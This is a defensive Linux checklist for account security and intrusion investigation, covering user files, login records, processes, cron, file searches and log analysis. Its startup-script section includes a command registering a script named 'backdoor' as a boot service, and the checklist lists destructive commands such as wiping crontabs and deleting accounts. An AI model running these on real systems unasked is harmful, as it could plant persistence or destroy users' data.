Essential Linux Account Security & Intrusion Investigation Checklist

Account Security

Details about user information files:

/etc/passwd

stores account data in the format

account:password:UID:GID:GECOS:directory:shell

. Example entry:

<code># Format: account:password:UID:GID:GECOS:directory:shell
root:x:0:0:root:/root:/bin/bash</code>

Common commands to view users:

<code># View login‑enabled users
cat /etc/passwd | grep /bin/bash
# Users with UID 0 (root)
awk -F: '$3==0{print $1}' /etc/passwd
# Users with sudo rights
more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"</code>

Note: Accounts without passwords can only log in locally.

The shadow file

/etc/shadow

stores encrypted passwords and expiration information. Example entry:

<code>root:$6$oGs1PqhL2p3ZetrE$X7o7bzoouHQVSEmSgsYN5UD4.kMHx6qgbTqwNVC5oOAouXvcjQSt.Ft7ql1WpkopY0UV9ajBwUt1DpYxTCVvI/:16809:0:99999:7:::</code>

Commands to view current logged‑in users and session duration:

<code>who
w
uptime</code>

Intrusion Investigation

Check recent successful and failed logins using

last

and

lastb

. The

/var/log/wtmp

file records login sessions; protect it from deletion with

chattr +a /var/log/wtmp

.

List privileged users and disable or delete suspicious accounts:

<code># Disable account
usermod -L user
# Delete account
userdel user
# Delete account and remove home directory
userdel -r user</code>

Inspect

.bash_history

for command history. Increase history size and add IP and timestamp:

<code># Save 10,000 commands
sed -i 's/^HISTSIZE=1000/HISTSIZE=10000/g' /etc/profile
USER_IP=`who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g'`
if [ "$USER_IP" = "" ]; then USER_IP=`hostname`; fi
export HISTTIMEFORMAT="%F %T $USER_IP `whoami` "
shopt -s histappend
export PROMPT_COMMAND="history -a"
source /etc/profile</code>

Check open ports and processes:

<code>netstat -antlp | more
ps aux | grep 6666
ls -l /proc/$PID/exe
lsof -p $PID
lsof -c sshd
lsof -i :22
kill -9 $PID</code>

Examine startup scripts and runlevels:

<code>runlevel
/etc/rc.local
/etc/rc.d/rc3.d/
update-rc.d backdoor defaults 99</code>

Review cron jobs and their locations:

<code>crontab -l
crontab -r
more /etc/cron.daily/*
find /var/spool/cron/crontabs/root</code>

Search for suspicious files by name, size, modification time, owner, or resource usage:

<code># By name
find / -name a.Test
# By size (>1000M)
find / -size +1000M
# Modified within last day
find / -mtime -1 -ls
# Files owned by root
find ./ -user root -type f
# Sort processes by CPU or memory usage
ps -ef --sort -pcpu
ps -ef --sort -pmem</code>

Log Inspection

Key logs reside in

/var/log/

:

secure

,

history

,

wtmp

,

lastlog

,

cron

,

message

,

apache2/access.log

, etc.

Typical log‑analysis commands:

<code># Find IPs attempting root brute‑force
grep "Failed password for root" /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr
# List successful logins
grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c
# Show useradd and userdel events
grep "useradd" /var/log/secure
grep "userdel" /var/log/secure
# Show sudo usage
sudo -l</code>